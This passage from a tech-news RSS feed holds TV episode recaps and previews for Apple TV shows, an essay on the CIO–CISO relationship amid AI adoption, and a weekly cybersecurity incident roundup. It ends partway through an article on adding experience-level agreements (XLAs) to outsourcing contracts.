

The fifth season contains five new episodes. Apple TV will release all five episodes on the premiere date, allowing families to watch the full season immediately.



Will Stillwater season 5 release weekly?



No. All five episodes will become available together on August 21, 2026.



Who voices Stillwater in the animated series?



James Sie voices Stillwater. The main cast also includes Eva Ariel Binder as Addy, Tucker Chandler as Michael, and Judah Mackey as Karl.



Is Stillwater suitable for children?



Yes. Stillwater is an animated kids and family series that focuses on emotional awareness, mindfulness, kindness, and solving everyday problems.



Where can I watch the previous seasons?



All four previous seasons are available to stream on Apple TV before season 5 arrives.



Is Stillwater season 5 the final season?



Apple TV has announced the fifth season but has not officially described it as the final season. Its future beyond these five episodes remains unconfirmed.



Apple TV costs $12.99 per month in the United States after a seven-day free trial. With every new episode arriving on the same day, families can watch Stillwater season 5 at their own pace from August 21. Do you plan to watch the new season? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sugar Season 2 Episode 5 Recap: Sugar Enters Pavich’s Inner Circle]]></title>
<description><![CDATA[Sugar Season 2 Episode 5, titled “Unknowns,” sees John Sugar protect Ji Moon while quietly entering Senator Pavich’s inner circle through a mysterious professor.



The episode continues the season’s central investigation into Ji’s disappearance, corrupt police officer Ray Vega, and the wider con...]]></description>
<link>https://tsecurity.de/de/3676034/ios-mac-os/sugar-season-2-episode-5-recap-sugar-enters-pavichs-inner-circle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676034/ios-mac-os/sugar-season-2-episode-5-recap-sugar-enters-pavichs-inner-circle/</guid>
<pubDate>Fri, 17 Jul 2026 14:22:59 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sugar Season 2 Episode 5, titled “Unknowns,” sees John Sugar protect Ji Moon while quietly entering Senator Pavich’s inner circle through a mysterious professor.



The episode continues the season’s central investigation into Ji’s disappearance, corrupt police officer Ray Vega, and the wider conspiracy operating across Los Angeles. Sugar also struggles with growing loneliness as he remains separated from the other members of his alien community.



Sugar Season 2 Episode 5 release details




Episode title: Unknowns



Release date: July 17, 2026



Streaming platform: Apple TV



Runtime: 40 minutes



Genre: Mystery, drama and science fiction



Rating: TV-MA



Main cast: Colin Farrell, Jin Ha, Raymond Lee, Tony Dalton, Laura Donnelly, Shea Whigham and Bernard White




Season 2 premiered on June 19, 2026, and contains eight episodes, with the finale scheduled for August 7. New episodes arrive weekly on Fridays.



Sugar hides Ji from Vega



Spoilers ahead for Sugar Season 2 Episode 5.



The episode begins after Sugar secretly brings Ji back from a near-fatal overdose. He takes Ji to a rehabilitation facility, where the young man can remain hidden from Vega and the corrupt officers searching for him.



Sugar then creates a false death certificate and allows Vega to believe that Ji has died. To make the story more convincing, Sugar confronts Vega at a private gathering and punches him, acting like a grieving investigator who has lost his witness.



However, Vega does not fully accept Ji’s death. He continues tracking Sugar’s movements and later returns to the cabin where Ji was found. A mounted animal head that Sugar accidentally disturbed catches Vega’s attention, suggesting that he has noticed something wrong with the scene.



Sugar enters Pavich’s inner circle



With Ji temporarily safe, Sugar returns to his investigation of Senator Pavich. He follows Dr. Stanley Ondaatje, a professor connected to Pavich, and breaks into his home.



Inside, Sugar discovers a strange document containing four circles. The meaning remains unclear, but the drawing appears connected to the secret project involving Pavich and the professor.



Sugar also finds a room filled with succulents and books about desert plants. He later approaches Ondaatje in a cactus garden and pretends to share his interest in plants. Their conversation allows Sugar to gain the professor’s trust without revealing that he has already searched his home.



Ondaatje describes the plants as stronger than they appear because they survive with very little in harsh environments. His words also reflect Sugar’s condition as someone living alone among humans while trying to understand how much he has changed.



Chuy’s phone could expose Vega



Sugar and Val also search for evidence that can support Ji’s claims against Vega. Since Ji witnessed Vega committing murder while involved in a crime himself, officials may question his reliability.



They believe Chuy could have recorded evidence on his phone. Sugar eventually finds a phone with an Aztec-style design after discovering Sandra dead from an overdose. The device could contain the proof needed to connect Vega to the murders and the operation in Downer Town.



Meanwhile, Danny accepts a boxing contract after refusing to apologize for his recent fight. Although he believes Ji has died, Sugar has secretly kept his brother alive.



The closing scenes focus on Sugar’s increasing attachment to human life. He spends the night talking with Charlotte before Peg appears and warns him that he is becoming too human.



Episode 5 pushes Sugar closer to Pavich while leaving Vega suspicious about Ji’s supposed death. What do you think the four-circle drawing means, and will Sugar’s connection with Charlotte place her in danger? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 4 Release Date, Time, and What to Expect]]></title>
<description><![CDATA[Silo Season 3 Episode 4 will arrive on Apple TV on Friday, July 24, 2026. The next chapter will continue Juliette Nichols’ fight to recover her memories while the Before Times storyline reveals more about the events that led to the creation of the silos.



Season 3 began on July 3 and follows a ...]]></description>
<link>https://tsecurity.de/de/3675994/ios-mac-os/silo-season-3-episode-4-release-date-time-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675994/ios-mac-os/silo-season-3-episode-4-release-date-time-and-what-to-expect/</guid>
<pubDate>Fri, 17 Jul 2026 14:10:37 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 4 will arrive on Apple TV on Friday, July 24, 2026. The next chapter will continue Juliette Nichols’ fight to recover her memories while the Before Times storyline reveals more about the events that led to the creation of the silos.



Season 3 began on July 3 and follows a weekly Friday release schedule. The ten-episode season will run through September 4, 2026.



Silo Season 3 Episode 4 release details




Release date: Friday, July 24, 2026



Release time: 12 a.m. PT and 3 a.m. ET



India release time: Around 12:30 p.m. IST



Streaming platform: Apple TV



Genre: Science fiction, dystopian drama and mystery



Expected duration: Around 45 to 60 minutes



Season episode count: 10 episodes



Season finale: September 4, 2026



Main cast: Rebecca Ferguson, Common, Harriet Walter, Chinaza Uche, Avi Nash, Alexandria Riley, Shane McRae and Remmie Milner




Ashley Zukerman, Jessica Henwick, Laura Innes, Jessica Brown Findlay, Morven Christie, Reed Birney, Matt Craven and Colin Hanks are among the major additions to the Season 3 cast. Steve Zahn also returns after playing Solo in Season 2.



What happened before Episode 4?



Spoilers ahead for Silo Season 3 Episodes 1 to 3.



Season 3 follows two connected timelines. Inside Silo 18, Juliette has returned after surviving her journey outside, but her damaged memories have left her vulnerable. Camille Sims and Nurse Amy have been using memory-altering drugs as part of a wider attempt to control her and weaken any resistance inside the silo.



Juliette gradually learns that other residents have also lost parts of their memories. Patrick Kennedy tells her about the drugs being used to make people forget, while Juliette continues searching for Lukas Kyle and the truth hidden from her.



Meanwhile, the Before Times storyline follows journalist Helen Drew and pilot Charlotte Keene. Helen investigates secret memory-erasure experiments connected to Dr. Crnkovich, while Charlotte begins recovering memories of a suspicious military operation. Their story appears closely tied to the political crisis and possible attack that eventually forced humanity underground.



What to expect from Silo Season 3 Episode 4



Episode 4 will likely push Juliette closer to discovering who altered her memories and why the Algorithm considers her dangerous. Her growing resistance to the medication also puts Camille, Sims and Nurse Amy under pressure, since they can no longer assume that Juliette will remain confused or obedient.



Patrick’s information about the forgetfulness drugs may help Juliette identify more people who were secretly controlled. Lukas could also return to the main storyline, especially because his knowledge of the Legacy and Salvador Quinn’s message makes him important to understanding the silos.



The Before Times plot should continue exploring Helen’s investigation and Charlotte’s recovered memories. Charlotte’s mission may reveal who planned the disaster, what the strange substance was and whether powerful officials helped create the conditions that led to the silo project.



As both timelines develop, Episode 4 should make the connection between Juliette’s present-day struggle and the original architects of the silo system much clearer.



Silo Season 3 Episode 4 streams on Apple TV on July 24. What do you think Juliette will remember next, and how deeply is Camille involved in the plan to control Silo 18? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[The last human relationship in cybersecurity]]></title>
<description><![CDATA[We are inundated with promises that artificial intelligence will save us and that the next governance framework will protect us. Buy this platform, adopt that model and the hard part finally gets easier. After 15 years in this field, I have wanted that shortcut as much as anyone.



But both prom...]]></description>
<link>https://tsecurity.de/de/3675960/it-nachrichten/the-last-human-relationship-in-cybersecurity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675960/it-nachrichten/the-last-human-relationship-in-cybersecurity/</guid>
<pubDate>Fri, 17 Jul 2026 14:03:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">We are inundated with promises that artificial intelligence will save us and that the next governance framework will protect us. Buy this platform, adopt that model and the hard part finally gets easier. After 15 years in this field, I have wanted that shortcut as much as anyone.</p>



<p class="wp-block-paragraph">But both promises are downstream of something neither one can produce. You cannot automate trust between two people. You cannot govern your way to a relationship. As AI moves into the core of how organizations operate, and accountability stops mapping cleanly to the org chart, what holds when the stakes are highest is not the platform or the policy. It is two human leaders who know each other well enough to carry the weight together.</p>



<p class="wp-block-paragraph">I think about this often now, a year after publishing a book about the pressures bearing down on security leaders, “<a href="https://www.amazon.com/dp/B0F6DDK8CD">The CISO On The Razor’s Edge: Leading Cybersecurity When The System Is Designed To Break</a>.” The partnership between the CIO and the CISO is the last human relationship in cybersecurity. AI raises the stakes. Governance sets the floor. The relationship is what holds.</p>



<p class="wp-block-paragraph">I saw it work once, up close. When I worked in Washington State, the CIO, <a href="https://www.linkedin.com/in/william-kehoe-a37a0714b/">Bill Kehoe</a>, talked to his CISO, <a href="https://www.linkedin.com/in/ralfjnsn/">Ralph Johnson</a>, every day. Weekends included. Not because a policy required it, but because the mission did. That partnership is a large part of why the role stayed sustainable for them when it broke so many others.</p>



<h2 class="wp-block-heading">The promise we keep believing</h2>



<p class="wp-block-paragraph">Walk any conference floor and you will hear the same pitch in a hundred variations. The next AI layer will close the gap. The next framework will lock down the risk. The technology is usually ready. The organization is not. I have watched too many well-funded programs stall to still believe the tool is the answer, and almost every time, the breakdown traced back to leaders who were not aligned before the work began. A framework run by misaligned leaders inherits the misalignment. You can buy the best controls on the market and still watch them fail when two leaders work from different assumptions about who owns what.</p>



<p class="wp-block-paragraph">Bill and Ralph understood this. Security decisions were not handed to Ralph after the fact to bless or block. They were made with him, inside the technology decisions, because the two had already agreed on what mattered. That is not governance. That is leadership creating the conditions in which governance can work.</p>



<p class="wp-block-paragraph">It is the real lesson I came to in the book. Technical knowledge matters, but it is not enough. As I wrote then, “Influence, trust and internal relationships are non-negotiable.” Without influence, CISOs cannot lead. Without technical substance, they cannot prioritize what matters. And without partnership, especially with their CIO, “they’re operating without a safety net.”</p>



<p class="wp-block-paragraph">AI does not change that truth. It raises the cost of ignoring it.</p>



<h2 class="wp-block-heading">When decisions move at machine speed</h2>



<p class="wp-block-paragraph">The ground under both roles is shifting. Work no longer flows through people alone. It moves across people, platforms, partners and agents at the same time, and it moves fast. Decisions that once waited for a meeting now form in seconds. The org chart, built for an era when humans did the work and reporting lines explained accountability, struggles to keep up.</p>



<p class="wp-block-paragraph">This is where the partnership stops being a nicety and becomes infrastructure. When decisions form at machine speed, the human escalation path has to be instant. There is no time to negotiate a relationship in the middle of an incident. Either the trust is already there, built in the quiet stretches before anything goes wrong, or it is not there when it counts.</p>



<p class="wp-block-paragraph">I asked Bill what he would lose if his daily calls with Ralph dropped to once a week. His answer cut straight to it.</p>



<p class="wp-block-paragraph">“Cyber does not rest,” he told me. “It is active and dynamic and requires 24/7/365 attention.” Drop to a weekly check-in, he explained, and “I am treating the CISO like any other executive position.” For Bill, AI only raises the stakes on that daily contact. “Relationships and partnerships between the CIO and CISO will never die due to AI,” he said. “I can’t even imagine a scenario where I don’t talk to my CISO on a daily basis including weekends to discuss the latest risks and vulnerabilities or news on potential AI attacks.”</p>



<p class="wp-block-paragraph">That is the point most of the market misses. A platform can flag the anomaly. It cannot decide what the organization is willing to risk, who carries that decision or how two leaders stand behind it together. The faster the machines move, the more the partnership has to already be in place.</p>



<h2 class="wp-block-heading">The loneliest seat in the building</h2>



<p class="wp-block-paragraph">There is a reason some now call the CISO job the least desirable role in business. The seat carries enormous accountability and rarely the authority to match. As one security leader put it, <a href="https://www.csoonline.com/article/4016334/has-ciso-become-the-least-desirable-role-in-business.html">the pressure has never been higher and the control has never felt lower</a>. People are burning out and walking away from a role that has never mattered more.</p>



<p class="wp-block-paragraph">Here is the hard part. There is no log file for burnout. No alert fires when the weight finally exceeds the leader. That drain is invisible right up until it is not, and it raises organizational risk as surely as any unpatched system. The structural fixes the industry debates are all real and all slow.</p>



<p class="wp-block-paragraph">The fastest source of relief available to a CISO is not a framework. It is a CIO who treats the relationship as a daily partnership rather than a line on a chart. An isolated CISO is a vulnerability. A partnered one is an asset.</p>



<p class="wp-block-paragraph">You see what that partnership is worth in the worst moment. I asked Bill what it looks like when an incident hits and public trust is on the line. He did not reach for a tool.</p>



<p class="wp-block-paragraph">“I am accountable as CIO to everything that occurs in the state from a technology lens including cyber,” he said. When a severe incident hits, the call comes to him from agency leadership or the Governor’s Office. Then he follows the plan, but never alone: “I will be in constant contact with the CISO on the details of the incident.”</p>



<p class="wp-block-paragraph">That is the safety net made real. The CISO is not carrying the mission alone at the moment it matters most. On the razor’s edge, leadership keeps you upright. Partnership keeps you in the fight.</p>



<h2 class="wp-block-heading">The work no tool will do for you</h2>



<p class="wp-block-paragraph">In my advisory work, I sit with C-suite leaders who share values and still cannot find alignment. The barrier is rarely disagreement. It is that they are not communicating clearly or often enough to build the trust that alignment requires. I have watched negotiations that could only happen by proxy, over email, because two capable leaders had stopped talking directly.</p>



<p class="wp-block-paragraph">I recently sat in an hour-long discussion where alignment and shared values were present the whole time. It did not become clear until the final fifteen minutes. That is what real alignment costs: patience, persistence and a stubborn commitment to clarity. If leaders cannot do that work themselves, no AI model or governance tool will do it for them.</p>



<p class="wp-block-paragraph">This is why I stand up an AI review board for the organizations I work with and host the leadership conversations that decide whether a company’s AI ambitions thrive or stall. The board itself matters less than what it provides: neutral ground, a regular cadence and an agenda that forces the hard issues into the open before a crisis forces them. If your organization has no venue like that, that absence is its own form of dysfunction. The cadence is what makes communication effective. Not easy. Effective.</p>



<h2 class="wp-block-heading">Build the bond on purpose</h2>



<p class="wp-block-paragraph">You cannot framework your way to trust. But you can build it deliberately, and that is a leadership act, not a governance one. The partnership and stakeholdering skills that once looked like soft extras are now the core executive work. A few moves matter most:</p>



<ul class="wp-block-list">
<li>Set a standing contact rhythm with your counterpart before you need one, daily or near-daily, not quarterly</li>



<li>Make decision rights and accountability explicit while it is calm, so no one improvises them mid-incident</li>



<li>Translate security into business outcomes together, so the board hears one aligned voice</li>
</ul>



<p class="wp-block-paragraph">Build the relationship as deliberately as you would build any critical control, because that is what it is. If you cannot connect the partnership to outcomes the business actually feels, you have a friendship, not a performance lever.</p>



<p class="wp-block-paragraph">A year after writing “The CISO On the Razor’s Edge,” I am even more convinced that strong leadership precedes effective governance and partnership precedes them both. This is the good news, not the hard news. The CIO and CISO who build real trust do not just reduce risk. They move faster than their competitors, because they spend no energy fighting each other. They earn the board’s confidence, because the board hears one clear voice. And they unlock the AI strategy everyone else is still struggling to govern, because they have already done the human work that makes governance hold.</p>



<p class="wp-block-paragraph">That is the upside waiting on the other side of this relationship. AI will keep advancing. Governance will keep maturing. But the organizations that win the next decade will be the ones where two leaders decided the partnership was worth building before they needed it. Bill and Ralph knew it every day, weekends included. The edge is there for anyone willing to do the same.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Cyber Express Weekly Roundup: TikTok Age Verification Probe, Healthcare Data Breach, Qantas Ruling, and Major Cyberattacks]]></title>
<description><![CDATA[This week’s cybersecurity roundup highlights growing concerns around online child safety, healthcare data protection, supply chain risks, and cyber threats affecting organizations worldwide. From regulatory scrutiny of digital platforms to large-scale vulnerabilities and operational disruptions, ...]]></description>
<link>https://tsecurity.de/de/3675935/it-security-nachrichten/the-cyber-express-weekly-roundup-tiktok-age-verification-probe-healthcare-data-breach-qantas-ruling-and-major-cyberattacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675935/it-security-nachrichten/the-cyber-express-weekly-roundup-tiktok-age-verification-probe-healthcare-data-breach-qantas-ruling-and-major-cyberattacks/</guid>
<pubDate>Fri, 17 Jul 2026 13:54:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1101" height="614" src="https://thecyberexpress.com/wp-content/uploads/weekly-round.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="weekly round" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/weekly-round.webp 1101w, https://thecyberexpress.com/wp-content/uploads/weekly-round-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/weekly-round-1024x571.webp 1024w, https://thecyberexpress.com/wp-content/uploads/weekly-round-768x428.webp 768w, https://thecyberexpress.com/wp-content/uploads/weekly-round-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/weekly-round-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/weekly-round-750x418.webp 750w, https://thecyberexpress.com/wp-content/uploads/weekly-round.webp 1101w, https://thecyberexpress.com/wp-content/uploads/weekly-round-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/weekly-round-1024x571.webp 1024w, https://thecyberexpress.com/wp-content/uploads/weekly-round-768x428.webp 768w, https://thecyberexpress.com/wp-content/uploads/weekly-round-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/weekly-round-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/weekly-round-750x418.webp 750w" sizes="(max-width: 1101px) 100vw, 1101px" title="The Cyber Express Weekly Roundup: TikTok Age Verification Probe, Healthcare Data Breach, Qantas Ruling, and Major Cyberattacks 1"></p><span data-contrast="auto">This week’s cybersecurity roundup highlights growing concerns around online child safety, healthcare data protection, supply chain risks, and cyber threats affecting organizations worldwide. From regulatory scrutiny of digital platforms to large-scale vulnerabilities and operational disruptions, recent incidents show how cyber risks continue expanding across industries.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The key theme in this weekly roundup is the increasing pressure on organizations to strengthen security, improve <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29030">data</a> protection measures, and adapt to rapidly changing threat environments. Regulators, businesses, and <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="29026">cybersecurity</a> teams are facing challenges ranging from social engineering attacks and malware incidents to vulnerabilities affecting widely used enterprise technologies.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h2 aria-level="2"><b><span data-contrast="none">The Cyber Express Weekly Roundup</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h2>
<h3 aria-level="3"><b><span data-contrast="none">UK Investigates TikTok Age Verification Compliance</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The UK communications regulator Ofcom has launched an investigation into TikTok’s age verification system, examining whether the platform is meeting its child safety obligations under the Online Safety Act. The probe comes as the UK government prepares stricter social media restrictions for users under 16, with enhanced age assurance requirements expected to take effect by Spring 2027. </span><a href="https://thecyberexpress.com/tiktok-age-verification-probe-launched-by-uk/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Partnered Health Cyberattack Exposes Australian Patient Data</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Healthcare provider Partnered Health has suffered a <a class="wpil_keyword_link" href="https://cyble.com/cyberattack/" target="_blank" rel="noopener" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="29031">cyberattack</a> that exposed sensitive patient information from 21 clinics across Australia. The compromised data reportedly includes personal details, Medicare information, health insurance records, and medical documents. Authorities and the company continue investigating the incident to determine the full scope of the breach and whether additional information was affected. </span><a href="https://thecyberexpress.com/partnered-health-cyberattack/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Qantas Data Breach Cleared After Privacy Review</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Australia’s privacy regulator has concluded its review of the 2025 Qantas <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-a-data-breach/" target="_blank" rel="noopener" title="data breach" data-wpil-keyword-link="linked" data-wpil-monitor-id="29029">data breach</a>, finding no evidence that the airline failed to take reasonable measures to protect customer information. The incident affected approximately 5.67 million records after attackers used <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-social-engineering/" target="_blank" rel="noopener" title="social engineering" data-wpil-keyword-link="linked" data-wpil-monitor-id="29032">social engineering</a> techniques to compromise a contact center employee. </span><a href="https://thecyberexpress.com/qantas-did-everything-right-yet-got-breached/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Nichirei Cyberattack Disrupts KFC Japan Supply Chain</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Japanese frozen food and logistics company Nichirei experienced a cyberattack that disrupted deliveries to KFC Japan after unauthorized access impacted its systems. The <a href="https://www.nichirei.co.jp/sites/default/files/inline-images/english/ir/pdf_file/news/20260716_e.pdf" target="_blank" rel="nofollow noopener">company isolated</a> affected infrastructure, suspended certain logistics operations, and began recovery efforts with external cybersecurity specialists while investigating the incident. </span><a href="https://thecyberexpress.com/nichirei-cyberattack-disrupts-supply-chain/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Microsoft Patch Tuesday Addresses 622 Security Flaws</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Microsoft’s July 2026 Patch Tuesday update fixed 622 <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="29033">vulnerabilities</a> across its product ecosystem, making it the company’s largest security release to date. The update included patches for two actively exploited zero-day vulnerabilities, CVE-2026-56164 and CVE-2026-56155, affecting Microsoft SharePoint Server and Active Directory Federation Services. </span><a href="https://thecyberexpress.com/microsoft-patch-tuesday-july-2026-622-flaws/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Nihon Kotsu Cyberattack Disrupts Japan Taxi Operations</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Japan’s largest taxi operator, Nihon Kotsu, suffered a malware-related cyberattack that forced the company to shut down parts of its IT infrastructure. The incident, detected on July 11, 2026, affected taxi dispatch services and internal systems as the company worked to contain the attack and investigate potential data exposure. </span><a href="https://thecyberexpress.com/nihon-kotsu-cyberattack/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h2 aria-level="2"><b><span data-contrast="none">Weekly Cybersecurity Takeaway</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h2>
<span data-contrast="auto">This week’s cybersecurity developments highlight the growing complexity of modern <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="29027">cyber</a> threats, with attacks and security challenges affecting technology platforms, healthcare providers, logistics companies, transportation services, and enterprise software environments. From regulatory action on digital safety to actively exploited vulnerabilities and supply chain disruptions, organizations are facing increased pressure to strengthen resilience and respond faster to emerging <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risks" data-wpil-keyword-link="linked" data-wpil-monitor-id="29028">risks</a>.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to add XLAs to your outsourcing contract]]></title>
<description><![CDATA[Organizations usually face the same questions concerning XLAs: What should we measure, who owns the data, how should incentives work, and how will this change provider behavior after signature.



There are no easy answers either, but after advising clients in MSP relationships with major provide...]]></description>
<link>https://tsecurity.de/de/3675704/it-nachrichten/how-to-add-xlas-to-your-outsourcing-contract/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675704/it-nachrichten/how-to-add-xlas-to-your-outsourcing-contract/</guid>
<pubDate>Fri, 17 Jul 2026 12:17:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Organizations usually face the same questions concerning XLAs: What should we measure, who owns the data, how should incentives work, and how will this change provider behavior after signature.</p>



<p class="wp-block-paragraph">There are no easy answers either, but after advising clients in MSP relationships with major providers, I’ve seen what works and what doesn’t. Successful XLA programs rarely start with massive transformation, nor rely on perfection before adding experience accountability to the contract.</p>



<h2 class="wp-block-heading">Start with the right metrics</h2>



<p class="wp-block-paragraph">The first concern I hear is what to measure. MSPs often steer that discussion toward metrics already in their reporting stack. That’s a trap.</p>



<p class="wp-block-paragraph">Unlike SLAs, which measure operational outputs, XLAs should focus on employee experience and <a href="https://www.cio.com/article/4166168/cios-rethink-its-operating-model-to-deliver-better-business-outcomes.html?utm=hybrid_search">business outcomes</a>. The strongest programs start with three to five high-signal metrics tied to the employee journeys creating the most friction. More than that and the program loses focus before it gains traction.</p>



<p class="wp-block-paragraph">I typically recommend starting with employee satisfaction scores, perceived lost productivity time, repeat incident rates, task completion success, and ease of getting support. Then focus early measurement on common employee experiences like service desk interactions, employee onboarding, application reliability, and device performance.</p>



<p class="wp-block-paragraph">Trying to measure everything is understandable, but it’s also one of the fastest ways to stall an XLA program.</p>



<h2 class="wp-block-heading">Precisely define roles and responsibilities</h2>



<p class="wp-block-paragraph">This is the part of XLA contract design where I spend the most time with clients, and it’s the part that major MSPs are most likely to leave vague if you let them. Accenture and TCS both have mature commercial teams skilled at agreeing to things in principle while avoiding specific accountability in writing. Don’t let that happen here.</p>



<p class="wp-block-paragraph">Employee experience isn’t solely the vendor’s responsibility. It’s genuinely shared, which is a more productive framing than pure vendor accountability, but only if the split is clearly spelled out. This is what I’ve found works in practice.</p>



<p class="wp-block-paragraph"><strong>Customer responsibilities</strong></p>



<ul class="wp-block-list">
<li>Selecting tools and platforms</li>



<li>Managing data infrastructure</li>



<li>Sharing experience data openly with the provider</li>



<li>Supporting internal improvement initiatives that the provider flags</li>
</ul>



<p class="wp-block-paragraph"><strong>Vendor responsibilities</strong></p>



<ul class="wp-block-list">
<li>Running the measurement cadence</li>



<li>Delivering monthly experience reporting</li>



<li>Identifying and surfacing improvement opportunities from the data</li>



<li>Executing operational improvements within agreed timelines</li>
</ul>



<p class="wp-block-paragraph">Without this level of specificity, XLA programs almost always become reporting exercises. The data gets collected, the scorecard gets presented, and nothing actually changes.</p>



<h2 class="wp-block-heading">Build flexible targets</h2>



<p class="wp-block-paragraph">One of the biggest mistakes in <a href="https://www.cio.com/article/4178678/your-outsourcing-contract-needs-xlas-not-just-slas.html?utm=hybrid_search">XLA design</a> is treating experience targets like traditional SLAs,  setting once at contract signing and left unchanged for years. Employee expectations, workforce patterns, and technology environments, after all, evolve constantly. A target that feels ambitious in year one may become meaningless by year three.</p>



<p class="wp-block-paragraph">The strongest XLA contracts include formal reviews every three to six months to recalibrate targets, align with business priorities, and raise expectations as experience improves. This prevents providers from locking in easy wins and coasting. When providers resist review cycles, it’s often a sign they believe the targets can be met on autopilot, a red flag in any XLA program.</p>



<h2 class="wp-block-heading">Use the right scoring method</h2>



<p class="wp-block-paragraph">One overlooked XLA best practice is how experience scores are calculated. Point-in-time scores can be distorted by outages, isolated incidents, or low survey participation, and providers sometimes exploit that volatility.</p>



<p class="wp-block-paragraph">I advise clients to calculate official XLA scores using rolling two-month averages instead of snapshots. It creates a more stable and accurate view of experience trends, and makes operational timing games much harder. Most importantly, define the scoring methodology explicitly in the contract. Don’t leave it to be worked out operationally after signing.</p>



<h2 class="wp-block-heading">Structure incentives carefully</h2>



<p class="wp-block-paragraph">Relying on penalty-only incentives is one of the most expensive XLA mistakes. On paper, the model is simple: miss the target, pay the penalty. In practice, it drives the wrong behavior. Providers focus on protecting themselves instead of improving employee experience, optimizing survey timing, and managing averages rather than solving problems collaboratively.</p>



